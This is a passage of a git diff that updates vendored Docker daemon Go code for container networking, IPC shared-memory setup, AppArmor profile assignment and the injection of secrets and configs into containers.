+		warnings = append(warnings, "Published ports are discarded when using host network mode")
+	}
+	return warnings, err
 }
diff --git a/vendor/github.com/docker/docker/daemon/container_linux.go b/vendor/github.com/docker/docker/daemon/container_linux.go
new file mode 100644
index 0000000000..e6f5bf2ccc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/container_linux.go
@@ -0,0 +1,30 @@
+//+build !windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
+)
+
+func (daemon *Daemon) saveApparmorConfig(container *container.Container) error {
+	container.AppArmorProfile = "" //we don't care about the previous value.
+
+	if !daemon.apparmorEnabled {
+		return nil // if apparmor is disabled there is nothing to do here.
+	}
+
+	if err := parseSecurityOpt(container, container.HostConfig); err != nil {
+		return errdefs.InvalidParameter(err)
+	}
+
+	if !container.HostConfig.Privileged {
+		if container.AppArmorProfile == "" {
+			container.AppArmorProfile = defaultApparmorProfile
+		}
+
+	} else {
+		container.AppArmorProfile = "unconfined"
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/container_operations.go b/vendor/github.com/docker/docker/daemon/container_operations.go
index c30250622d..df84f88f3f 100644
--- a/vendor/github.com/docker/docker/daemon/container_operations.go
+++ b/vendor/github.com/docker/docker/daemon/container_operations.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"errors"
@@ -10,34 +10,47 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	derr "github.com/docker/docker/api/errors"
 	containertypes "github.com/docker/docker/api/types/container"
 	networktypes "github.com/docker/docker/api/types/network"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/opts"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/runconfig"
 	"github.com/docker/go-connections/nat"
 	"github.com/docker/libnetwork"
+	netconst "github.com/docker/libnetwork/datastore"
 	"github.com/docker/libnetwork/netlabel"
 	"github.com/docker/libnetwork/options"
 	"github.com/docker/libnetwork/types"
+	"github.com/sirupsen/logrus"
 )
 
 var (
 	// ErrRootFSReadOnly is returned when a container
 	// rootfs is marked readonly.
 	ErrRootFSReadOnly = errors.New("container rootfs is marked read-only")
-	getPortMapInfo    = container.GetSandboxPortMapInfo
+	getPortMapInfo    = getSandboxPortMapInfo
 )
 
+func (daemon *Daemon) getDNSSearchSettings(container *container.Container) []string {
+	if len(container.HostConfig.DNSSearch) > 0 {
+		return container.HostConfig.DNSSearch
+	}
+
+	if len(daemon.configStore.DNSSearch) > 0 {
+		return daemon.configStore.DNSSearch
+	}
+
+	return nil
+}
+
 func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]libnetwork.SandboxOption, error) {
 	var (
 		sboxOptions []libnetwork.SandboxOption
 		err         error
 		dns         []string
-		dnsSearch   []string
 		dnsOptions  []string
 		bindings    = make(nat.PortMap)
 		pbList      []types.PortBinding
@@ -78,11 +91,7 @@ func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]lib
 		sboxOptions = append(sboxOptions, libnetwork.OptionDNS(d))
 	}
 
-	if len(container.HostConfig.DNSSearch) > 0 {
-		dnsSearch = container.HostConfig.DNSSearch
-	} else if len(daemon.configStore.DNSSearch) > 0 {
-		dnsSearch = daemon.configStore.DNSSearch
-	}
+	dnsSearch := daemon.getDNSSearchSettings(container)
 
 	for _, ds := range dnsSearch {
 		sboxOptions = append(sboxOptions, libnetwork.OptionDNSSearch(ds))
@@ -111,6 +120,9 @@ func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]lib
 
 	for _, extraHost := range container.HostConfig.ExtraHosts {
 		// allow IPv6 addresses in extra hosts; only split on first ":"
+		if _, err := opts.ValidateExtraHost(extraHost); err != nil {
+			return nil, err
+		}
 		parts := strings.SplitN(extraHost, ":", 2)
 		sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(parts[0], parts[1]))
 	}
@@ -241,13 +253,20 @@ func (daemon *Daemon) updateNetworkSettings(container *container.Container, n li
 		return runconfig.ErrConflictHostNetwork
 	}
 
-	for s := range container.NetworkSettings.Networks {
-		sn, err := daemon.FindNetwork(s)
+	for s, v := range container.NetworkSettings.Networks {
+		sn, err := daemon.FindNetwork(getNetworkID(s, v.EndpointSettings))
 		if err != nil {
 			continue
 		}
 
 		if sn.Name() == n.Name() {
+			// If the network scope is swarm, then this
+			// is an attachable network, which may not
+			// be locally available previously.
+			// So always update.
+			if n.Info().Scope() == netconst.SwarmScope {
+				continue
+			}
 			// Avoid duplicate config
 			return nil
 		}
@@ -261,22 +280,20 @@ func (daemon *Daemon) updateNetworkSettings(container *container.Container, n li
 		}
 	}
 
-	if _, ok := container.NetworkSettings.Networks[n.Name()]; !ok {
-		container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{
-			EndpointSettings: endpointConfig,
-		}
+	container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{
+		EndpointSettings: endpointConfig,
 	}
 
 	return nil
 }
 
 func (daemon *Daemon) updateEndpointNetworkSettings(container *container.Container, n libnetwork.Network, ep libnetwork.Endpoint) error {
-	if err := container.BuildEndpointInfo(n, ep); err != nil {
+	if err := buildEndpointInfo(container.NetworkSettings, n, ep); err != nil {
 		return err
 	}
 
 	if container.HostConfig.NetworkMode == runconfig.DefaultDaemonNetworkMode() {
-		container.NetworkSettings.Bridge = daemon.configStore.bridgeConfig.Iface
+		container.NetworkSettings.Bridge = daemon.configStore.BridgeConfig.Iface
 	}
 
 	return nil
@@ -298,8 +315,8 @@ func (daemon *Daemon) updateNetwork(container *container.Container) error {
 
 	// Find if container is connected to the default bridge network
 	var n libnetwork.Network
-	for name := range container.NetworkSettings.Networks {
-		sn, err := daemon.FindNetwork(name)
+	for name, v := range container.NetworkSettings.Networks {
+		sn, err := daemon.FindNetwork(getNetworkID(name, v.EndpointSettings))
 		if err != nil {
 			continue
 		}
@@ -329,7 +346,9 @@ func (daemon *Daemon) updateNetwork(container *container.Container) error {
 }
 
 func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrName string, epConfig *networktypes.EndpointSettings) (libnetwork.Network, *networktypes.NetworkingConfig, error) {
-	n, err := daemon.FindNetwork(idOrName)
+	id := getNetworkID(idOrName, epConfig)
+
+	n, err := daemon.FindNetwork(id)
 	if err != nil {
 		// We should always be able to find the network for a
 		// managed container.
@@ -362,27 +381,32 @@ func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrN
 		retryCount int
 	)
 
+	if n == nil && daemon.attachableNetworkLock != nil {
+		daemon.attachableNetworkLock.Lock(id)
+		defer daemon.attachableNetworkLock.Unlock(id)
+	}
+
 	for {
 		// In all other cases, attempt to attach to the network to
 		// trigger attachment in the swarm cluster manager.
 		if daemon.clusterProvider != nil {
 			var err error
-			config, err = daemon.clusterProvider.AttachNetwork(idOrName, container.ID, addresses)
+			config, err = daemon.clusterProvider.AttachNetwork(id, container.ID, addresses)
 			if err != nil {
 				return nil, nil, err
 			}
 		}
 
-		n, err = daemon.FindNetwork(idOrName)
+		n, err = daemon.FindNetwork(id)
 		if err != nil {
 			if daemon.clusterProvider != nil {
-				if err := daemon.clusterProvider.DetachNetwork(idOrName, container.ID); err != nil {
+				if err := daemon.clusterProvider.DetachNetwork(id, container.ID); err != nil {
 					logrus.Warnf("Could not rollback attachment for container %s to network %s: %v", container.ID, idOrName, err)
 				}
 			}
 
 			// Retry network attach again if we failed to
-			// find the network after successfull
+			// find the network after successful
 			// attachment because the only reason that
 			// would happen is if some other container
 			// attached to the swarm scope network went down
@@ -410,7 +434,7 @@ func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrN
 	return n, config, nil
 }
 
-// updateContainerNetworkSettings update the network settings
+// updateContainerNetworkSettings updates the network settings
 func (daemon *Daemon) updateContainerNetworkSettings(container *container.Container, endpointsConfig map[string]*networktypes.EndpointSettings) {
 	var n libnetwork.Network
 
@@ -495,12 +519,13 @@ func (daemon *Daemon) allocateNetwork(container *container.Container) error {
 		logrus.Errorf("failed to cleanup up stale network sandbox for container %s", container.ID)
 	}
 
+	if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() {
+		return nil
+	}
+
 	updateSettings := false
-	if len(container.NetworkSettings.Networks) == 0 {
-		if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() {
-			return nil
-		}
 
+	if len(container.NetworkSettings.Networks) == 0 {
 		daemon.updateContainerNetworkSettings(container, nil)
 		updateSettings = true
 	}
@@ -535,7 +560,29 @@ func (daemon *Daemon) allocateNetwork(container *container.Container) error {
 		}
 	}
 
-	if err := container.WriteHostConfig(); err != nil {
+	// If the container is not to be connected to any network,
+	// create its network sandbox now if not present
+	if len(networks) == 0 {
+		if nil == daemon.getNetworkSandbox(container) {
+			options, err := daemon.buildSandboxOptions(container)
+			if err != nil {
+				return err
+			}
+			sb, err := daemon.netController.NewSandbox(container.ID, options...)
+			if err != nil {
+				return err
+			}
+			updateSandboxNetworkSettings(container, sb)
+			defer func() {
+				if err != nil {
+					sb.Delete()
+				}
+			}()
+		}
+
+	}
+
+	if _, err := container.WriteHostConfig(); err != nil {
 		return err
 	}
 	networkActions.WithValues("allocate").UpdateSince(start)
@@ -693,7 +740,7 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName
 
 	controller := daemon.netController
 	sb := daemon.getNetworkSandbox(container)
-	createOptions, err := container.BuildCreateEndpointOptions(n, endpointConfig, sb, daemon.configStore.DNS)
+	createOptions, err := buildCreateEndpointOptions(container, n, endpointConfig, sb, daemon.configStore.DNS)
 	if err != nil {
 		return err
 	}
@@ -732,10 +779,10 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName
 			return err
 		}
 
-		container.UpdateSandboxNetworkSettings(sb)
+		updateSandboxNetworkSettings(container, sb)
 	}
 
-	joinOptions, err := container.BuildJoinOptions(n)
+	joinOptions, err := buildJoinOptions(container.NetworkSettings, n)
 	if err != nil {
 		return err
 	}
@@ -751,7 +798,7 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName
 		}
 	}
 
-	if err := container.UpdateJoinInfo(n, ep); err != nil {
+	if err := updateJoinInfo(container.NetworkSettings, n, ep); err != nil {
 		return fmt.Errorf("Updating join info failed: %v", err)
 	}
 
@@ -762,6 +809,37 @@ func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName
 	return nil
 }
 
+func updateJoinInfo(networkSettings *network.Settings, n libnetwork.Network, ep libnetwork.Endpoint) error { // nolint: interfacer
+	if ep == nil {
+		return errors.New("invalid enppoint whhile building portmap info")
+	}
+
+	if networkSettings == nil {
+		return errors.New("invalid network settings while building port map info")
+	}
+
+	if len(networkSettings.Ports) == 0 {
+		pm, err := getEndpointPortMapInfo(ep)
+		if err != nil {
+			return err
+		}
+		networkSettings.Ports = pm
+	}
+
+	epInfo := ep.Info()
+	if epInfo == nil {
+		// It is not an error to get an empty endpoint info
+		return nil
+	}
+	if epInfo.Gateway() != nil {
+		networkSettings.Networks[n.Name()].Gateway = epInfo.Gateway().String()
+	}
+	if epInfo.GatewayIPv6().To16() != nil {
+		networkSettings.Networks[n.Name()].IPv6Gateway = epInfo.GatewayIPv6().String()
+	}
+	return nil
+}
+
 // ForceEndpointDelete deletes an endpoint from a network forcefully
 func (daemon *Daemon) ForceEndpointDelete(name string, networkName string) error {
 	n, err := daemon.FindNetwork(networkName)
@@ -808,7 +886,7 @@ func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n li
 	}
 
 	if ep == nil {
-		return fmt.Errorf("container %s is not connected to the network", container.ID)
+		return fmt.Errorf("container %s is not connected to network %s", container.ID, n.Name())
 	}
 
 	if err := ep.Leave(sbox); err != nil {
@@ -823,16 +901,24 @@ func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n li
 
 	delete(container.NetworkSettings.Networks, n.Name())
 
-	if daemon.clusterProvider != nil && n.Info().Dynamic() && !container.Managed {
-		if err := daemon.clusterProvider.DetachNetwork(n.Name(), container.ID); err != nil {
-			logrus.Warnf("error detaching from network %s: %v", n.Name(), err)
-			if err := daemon.clusterProvider.DetachNetwork(n.ID(), container.ID); err != nil {
-				logrus.Warnf("error detaching from network %s: %v", n.ID(), err)
+	daemon.tryDetachContainerFromClusterNetwork(n, container)
+
+	return nil
+}
+
+func (daemon *Daemon) tryDetachContainerFromClusterNetwork(network libnetwork.Network, container *container.Container) {
+	if daemon.clusterProvider != nil && network.Info().Dynamic() && !container.Managed {
+		if err := daemon.clusterProvider.DetachNetwork(network.Name(), container.ID); err != nil {
+			logrus.Warnf("error detaching from network %s: %v", network.Name(), err)
+			if err := daemon.clusterProvider.DetachNetwork(network.ID(), container.ID); err != nil {
+				logrus.Warnf("error detaching from network %s: %v", network.ID(), err)
 			}
 		}
 	}
-
-	return nil
+	attributes := map[string]string{
+		"container": container.ID,
+	}
+	daemon.LogNetworkEventWithAttributes(network, "disconnect", attributes)
 }
 
 func (daemon *Daemon) initializeNetworking(container *container.Container) error {
@@ -844,7 +930,12 @@ func (daemon *Daemon) initializeNetworking(container *container.Container) error
 		if err != nil {
 			return err
 		}
-		initializeNetworkingPaths(container, nc)
+
+		err = daemon.initializeNetworkingPaths(container, nc)
+		if err != nil {
+			return err
+		}
+
 		container.Config.Hostname = nc.Config.Hostname
 		container.Config.Domainname = nc.Config.Domainname
 		return nil
@@ -876,7 +967,7 @@ func (daemon *Daemon) getNetworkedContainer(containerID, connectedContainerID st
 	}
 	if !nc.IsRunning() {
 		err := fmt.Errorf("cannot join network of a non running container: %s", connectedContainerID)
-		return nil, derr.NewRequestConflictError(err)
+		return nil, errdefs.Conflict(err)
 	}
 	if nc.IsRestarting() {
 		return nil, errContainerIsRestarting(connectedContainerID)
@@ -897,13 +988,13 @@ func (daemon *Daemon) releaseNetwork(container *container.Container) {
 	settings := container.NetworkSettings.Networks
 	container.NetworkSettings.Ports = nil
 
-	if sid == "" || len(settings) == 0 {
+	if sid == "" {
 		return
 	}
 
 	var networks []libnetwork.Network
 	for n, epSettings := range settings {
-		if nw, err := daemon.FindNetwork(n); err == nil {
+		if nw, err := daemon.FindNetwork(getNetworkID(n, epSettings.EndpointSettings)); err == nil {
 			networks = append(networks, nw)
 		}
 
@@ -925,19 +1016,7 @@ func (daemon *Daemon) releaseNetwork(container *container.Container) {
 	}
 
 	for _, nw := range networks {
-		if daemon.clusterProvider != nil && nw.Info().Dynamic() && !container.Managed {
-			if err := daemon.clusterProvider.DetachNetwork(nw.Name(), container.ID); err != nil {
-				logrus.Warnf("error detaching from network %s: %v", nw.Name(), err)
-				if err := daemon.clusterProvider.DetachNetwork(nw.ID(), container.ID); err != nil {
-					logrus.Warnf("error detaching from network %s: %v", nw.ID(), err)
-				}
-			}
-		}
-
-		attributes := map[string]string{
-			"container": container.ID,
-		}
-		daemon.LogNetworkEventWithAttributes(nw, "disconnect", attributes)
+		daemon.tryDetachContainerFromClusterNetwork(nw, container)
 	}
 	networkActions.WithValues("release").UpdateSince(start)
 }
@@ -951,6 +1030,9 @@ func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName
 	if endpointConfig == nil {
 		endpointConfig = &networktypes.EndpointSettings{}
 	}
+	container.Lock()
+	defer container.Unlock()
+
 	if !container.Running {
 		if container.RemovalInProgress || container.Dead {
 			return errRemovalContainer(container.ID)
@@ -973,15 +1055,16 @@ func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName
 			return err
 		}
 	}
-	if err := container.ToDiskLocking(); err != nil {
-		return fmt.Errorf("Error saving container to disk: %v", err)
-	}
-	return nil
+
+	return container.CheckpointTo(daemon.containersReplica)
 }
 
 // DisconnectFromNetwork disconnects container from network n.
 func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, networkName string, force bool) error {
 	n, err := daemon.FindNetwork(networkName)
+	container.Lock()
+	defer container.Unlock()
+
 	if !container.Running || (err != nil && force) {
 		if container.RemovalInProgress || container.Dead {
 			return errRemovalContainer(container.ID)
@@ -1009,16 +1092,16 @@ func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, netw
 		return err
 	}
 
-	if err := container.ToDiskLocking(); err != nil {
-		return fmt.Errorf("Error saving container to disk: %v", err)
+	if err := container.CheckpointTo(daemon.containersReplica); err != nil {
+		return err
 	}
 
 	if n != nil {
-		attributes := map[string]string{
+		daemon.LogNetworkEventWithAttributes(n, "disconnect", map[string]string{
 			"container": container.ID,
-		}
-		daemon.LogNetworkEventWithAttributes(n, "disconnect", attributes)
+		})
 	}
+
 	return nil
 }
 
@@ -1035,7 +1118,7 @@ func (daemon *Daemon) ActivateContainerServiceBinding(containerName string) erro
 	return sb.EnableService()
 }
 
-// DeactivateContainerServiceBinding remove this container fromload balancer active rotation, and DNS response
+// DeactivateContainerServiceBinding removes this container from load balancer active rotation, and DNS response
 func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) error {
 	container, err := daemon.GetContainer(containerName)
 	if err != nil {
@@ -1043,7 +1126,25 @@ func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) er
 	}
 	sb := daemon.getNetworkSandbox(container)
 	if sb == nil {
-		return fmt.Errorf("network sandbox does not exist for container %s", containerName)
+		// If the network sandbox is not found, then there is nothing to deactivate
+		logrus.Debugf("Could not find network sandbox for container %s on service binding deactivation request", containerName)
+		return nil
 	}
 	return sb.DisableService()
 }
+
+func getNetworkID(name string, endpointSettings *networktypes.EndpointSettings) string {
+	// We only want to prefer NetworkID for user defined networks.
+	// For systems like bridge, none, etc. the name is preferred (otherwise restart may cause issues)
+	if containertypes.NetworkMode(name).IsUserDefined() && endpointSettings != nil && endpointSettings.NetworkID != "" {
+		return endpointSettings.NetworkID
+	}
+	return name
+}
+
+// updateSandboxNetworkSettings updates the sandbox ID and Key.
+func updateSandboxNetworkSettings(c *container.Container, sb libnetwork.Sandbox) error {
+	c.NetworkSettings.SandboxID = sb.ID()
+	c.NetworkSettings.SandboxKey = sb.Key()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go
deleted file mode 100644
index 1653948de1..0000000000
--- a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go
+++ /dev/null
@@ -1,46 +0,0 @@
-// +build solaris
-
-package daemon
-
-import (
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/runconfig"
-	"github.com/docker/libnetwork"
-)
-
-func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) {
-	return nil, nil
-}
-
-func (daemon *Daemon) setupIpcDirs(container *container.Container) error {
-	return nil
-}
-
-func killProcessDirectly(container *container.Container) error {
-	return nil
-}
-
-func detachMounted(path string) error {
-	return nil
-}
-
-func isLinkable(child *container.Container) bool {
-	// A container is linkable only if it belongs to the default network
-	_, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()]
-	return ok
-}
-
-func enableIPOnPredefinedNetwork() bool {
-	return false
-}
-
-func (daemon *Daemon) isNetworkHotPluggable() bool {
-	return false
-}
-
-func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error {
-	return nil
-}
-
-func initializeNetworkingPaths(container *container.Container, nc *container.Container) {
-}
diff --git a/vendor/github.com/docker/docker/daemon/container_operations_unix.go b/vendor/github.com/docker/docker/daemon/container_operations_unix.go
index 2296045765..bc7ee45233 100644
--- a/vendor/github.com/docker/docker/daemon/container_operations_unix.go
+++ b/vendor/github.com/docker/docker/daemon/container_operations_unix.go
@@ -1,27 +1,28 @@
 // +build linux freebsd
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
 	"io/ioutil"
 	"os"
 	"path/filepath"
 	"strconv"
-	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/cloudflare/cfssl/log"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/links"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/runconfig"
 	"github.com/docker/libnetwork"
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/opencontainers/selinux/go-selinux/label"
 	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) {
@@ -57,133 +58,143 @@ func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]s
 	return env, nil
 }
 
-func (daemon *Daemon) getIpcContainer(container *container.Container) (*container.Container, error) {
-	containerID := container.HostConfig.IpcMode.Container()
-	c, err := daemon.GetContainer(containerID)
+func (daemon *Daemon) getIpcContainer(id string) (*container.Container, error) {
+	errMsg := "can't join IPC of container " + id
+	// Check the container exists
+	container, err := daemon.GetContainer(id)
 	if err != nil {
-		return nil, err
+		return nil, errors.Wrap(err, errMsg)
 	}
-	if !c.IsRunning() {
-		return nil, fmt.Errorf("cannot join IPC of a non running container: %s", containerID)
+	// Check the container is running and not restarting
+	if err := daemon.checkContainer(container, containerIsRunning, containerIsNotRestarting); err != nil {
+		return nil, errors.Wrap(err, errMsg)
 	}
-	if c.IsRestarting() {
-		return nil, errContainerIsRestarting(container.ID)
+	// Check the container ipc is shareable
+	if st, err := os.Stat(container.ShmPath); err != nil || !st.IsDir() {
+		if err == nil || os.IsNotExist(err) {
+			return nil, errors.New(errMsg + ": non-shareable IPC")
+		}
+		// stat() failed?
+		return nil, errors.Wrap(err, errMsg+": unexpected error from stat "+container.ShmPath)
 	}
-	return c, nil
+
+	return container, nil
 }
 
 func (daemon *Daemon) getPidContainer(container *container.Container) (*container.Container, error) {
 	containerID := container.HostConfig.PidMode.Container()
-	c, err := daemon.GetContainer(containerID)
+	container, err := daemon.GetContainer(containerID)
 	if err != nil {
-		return nil, err
+		return nil, errors.Wrapf(err, "cannot join PID of a non running container: %s", containerID)
 	}
+	return container, daemon.checkContainer(container, containerIsRunning, containerIsNotRestarting)
+}
+
+func containerIsRunning(c *container.Container) error {
 	if !c.IsRunning() {
-		return nil, fmt.Errorf("cannot join PID of a non running container: %s", containerID)
+		return errdefs.Conflict(errors.Errorf("container %s is not running", c.ID))
 	}
+	return nil
+}
+
+func containerIsNotRestarting(c *container.Container) error {
 	if c.IsRestarting() {
-		return nil, errContainerIsRestarting(container.ID)
+		return errContainerIsRestarting(c.ID)
 	}
-	return c, nil
+	return nil
 }
 
 func (daemon *Daemon) setupIpcDirs(c *container.Container) error {
-	var err error
-
-	c.ShmPath, err = c.ShmResourcePath()
-	if err != nil {
-		return err
-	}
+	ipcMode := c.HostConfig.IpcMode
 
-	if c.HostConfig.IpcMode.IsContainer() {
-		ic, err := daemon.getIpcContainer(c)
+	switch {
+	case ipcMode.IsContainer():
+		ic, err := daemon.getIpcContainer(ipcMode.Container())
 		if err != nil {
 			return err
 		}
 		c.ShmPath = ic.ShmPath
-	} else if c.HostConfig.IpcMode.IsHost() {
+
+	case ipcMode.IsHost():
 		if _, err := os.Stat("/dev/shm"); err != nil {
 			return fmt.Errorf("/dev/shm is not mounted, but must be for --ipc=host")
 		}
 		c.ShmPath = "/dev/shm"
-	} else {
-		rootUID, rootGID := daemon.GetRemappedUIDGID()
+
+	case ipcMode.IsPrivate(), ipcMode.IsNone():
+		// c.ShmPath will/should not be used, so make it empty.
+		// Container's /dev/shm mount comes from OCI spec.
+		c.ShmPath = ""
+
+	case ipcMode.IsEmpty():
+		// A container was created by an older version of the daemon.
+		// The default behavior used to be what is now called "shareable".
+		fallthrough
+
+	case ipcMode.IsShareable():
+		rootIDs := daemon.idMappings.RootPair()
 		if !c.HasMountFor("/dev/shm") {
 			shmPath, err := c.ShmResourcePath()
 			if err != nil {
 				return err
 			}
 
-			if err := idtools.MkdirAllAs(shmPath, 0700, rootUID, rootGID); err != nil {
+			if err := idtools.MkdirAllAndChown(shmPath, 0700, rootIDs); err != nil {
 				return err
 			}
 
-			shmSize := container.DefaultSHMSize
-			if c.HostConfig.ShmSize != 0 {
-				shmSize = c.HostConfig.ShmSize
-			}
-			shmproperty := "mode=1777,size=" + strconv.FormatInt(shmSize, 10)
-			if err := syscall.Mount("shm", shmPath, "tmpfs", uintptr(syscall.MS_NOEXEC|syscall.MS_NOSUID|syscall.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil {
+			shmproperty := "mode=1777,size=" + strconv.FormatInt(c.HostConfig.ShmSize, 10)
+			if err := unix.Mount("shm", shmPath, "tmpfs", uintptr(unix.MS_NOEXEC|unix.MS_NOSUID|unix.MS_NODEV), label.FormatMountLabel(shmproperty, c.GetMountLabel())); err != nil {
 				return fmt.Errorf("mounting shm tmpfs: %s", err)
 			}
-			if err := os.Chown(shmPath, rootUID, rootGID); err != nil {
+			if err := os.Chown(shmPath, rootIDs.UID, rootIDs.GID); err != nil {
 				return err
 			}
+			c.ShmPath = shmPath
 		}
 
+	default:
+		return fmt.Errorf("invalid IPC mode: %v", ipcMode)
 	}
 
 	return nil
 }
 
 func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) {
-	if len(c.SecretReferences) == 0 {
+	if len(c.SecretReferences) == 0 && len(c.ConfigReferences) == 0 {
 		return nil
 	}
 
-	localMountPath := c.SecretMountPath()
-	logrus.Debugf("secrets: setting up secret dir: %s", localMountPath)
-
+	if err := daemon.createSecretsDir(c); err != nil {
+		return err
+	}
 	defer func() {
 		if setupErr != nil {
-			// cleanup
-			_ = detachMounted(localMountPath)
-
-			if err := os.RemoveAll(localMountPath); err != nil {
-				log.Errorf("error cleaning up secret mount: %s", err)
-			}
+			daemon.cleanupSecretDir(c)
 		}
 	}()
 
-	// retrieve possible remapped range start for root UID, GID
-	rootUID, rootGID := daemon.GetRemappedUIDGID()
-	// create tmpfs
-	if err := idtools.MkdirAllAs(localMountPath, 0700, rootUID, rootGID); err != nil {
-		return errors.Wrap(err, "error creating secret local mount path")
-	}
-	tmpfsOwnership := fmt.Sprintf("uid=%d,gid=%d", rootUID, rootGID)
-	if err := mount.Mount("tmpfs", localMountPath, "tmpfs", "nodev,nosuid,noexec,"+tmpfsOwnership); err != nil {
-		return errors.Wrap(err, "unable to setup secret mount")
+	if c.DependencyStore == nil {
+		return fmt.Errorf("secret store is not initialized")
 	}
 
-	for _, s := range c.SecretReferences {
-		if c.SecretStore == nil {
-			return fmt.Errorf("secret store is not initialized")
-		}
+	// retrieve possible remapped range start for root UID, GID
+	rootIDs := daemon.idMappings.RootPair()
 
+	for _, s := range c.SecretReferences {
 		// TODO (ehazlett): use type switch when more are supported
 		if s.File == nil {
-			return fmt.Errorf("secret target type is not a file target")
+			logrus.Error("secret target type is not a file target")
+			continue
 		}
 
-		targetPath := filepath.Clean(s.File.Name)
-		// ensure that the target is a filename only; no paths allowed
-		if targetPath != filepath.Base(targetPath) {
-			return fmt.Errorf("error creating secret: secret must not be a path")
+		// secrets are created in the SecretMountPath on the host, at a
+		// single level
+		fPath, err := c.SecretFilePath(*s)
+		if err != nil {
+			return errors.Wrap(err, "error getting secret file path")
 		}
-
-		fPath := filepath.Join(localMountPath, targetPath)
-		if err := idtools.MkdirAllAs(filepath.Dir(fPath), 0700, rootUID, rootGID); err != nil {
+		if err := idtools.MkdirAllAndChown(filepath.Dir(fPath), 0700, rootIDs); err != nil {
 			return errors.Wrap(err, "error creating secret mount path")
 		}
 
@@ -191,9 +202,9 @@ func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) {
 			"name": s.File.Name,
 			"path": fPath,
 		}).Debug("injecting secret")
-		secret := c.SecretStore.Get(s.SecretID)
-		if secret == nil {
-			return fmt.Errorf("unable to get secret from secret store")
+		secret, err := c.DependencyStore.Secrets().Get(s.SecretID)
+		if err != nil {
+			return errors.Wrap(err, "unable to get secret from secret store")
 		}
 		if err := ioutil.WriteFile(fPath, secret.Spec.Data, s.File.Mode); err != nil {
 			return errors.Wrap(err, "error injecting secret")
@@ -208,26 +219,127 @@ func (daemon *Daemon) setupSecretDir(c *container.Container) (setupErr error) {
 			return err
 		}
 
-		if err := os.Chown(fPath, rootUID+uid, rootGID+gid); err != nil {
+		if err := os.Chown(fPath, rootIDs.UID+uid, rootIDs.GID+gid); err != nil {
 			return errors.Wrap(err, "error setting ownership for secret")
 		}
+		if err := os.Chmod(fPath, s.File.Mode); err != nil {
+			return errors.Wrap(err, "error setting file mode for secret")
+		}
+	}
+
+	for _, ref := range c.ConfigReferences {
+		// TODO (ehazlett): use type switch when more are supported
+		if ref.File == nil {
+			logrus.Error("config target type is not a file target")
+			continue
+		}
+
+		fPath, err := c.ConfigFilePath(*ref)
+		if err != nil {
+			return errors.Wrap(err, "error getting config file path for container")
+		}
+		if err := idtools.MkdirAllAndChown(filepath.Dir(fPath), 0700, rootIDs); err != nil {
+			return errors.Wrap(err, "error creating config mount path")
+		}
+
+		logrus.WithFields(logrus.Fields{
+			"name": ref.File.Name,
+			"path": fPath,
+		}).Debug("injecting config")
+		config, err := c.DependencyStore.Configs().Get(ref.ConfigID)
+		if err != nil {
+			return errors.Wrap(err, "unable to get config from config store")
+		}
+		if err := ioutil.WriteFile(fPath, config.Spec.Data, ref.File.Mode); err != nil {
+			return errors.Wrap(err, "error injecting config")
+		}
+
+		uid, err := strconv.Atoi(ref.File.UID)
+		if err != nil {
+			return err
+		}
+		gid, err := strconv.Atoi(ref.File.GID)
+		if err != nil {
+			return err
+		}
+
+		if err := os.Chown(fPath, rootIDs.UID+uid, rootIDs.GID+gid); err != nil {
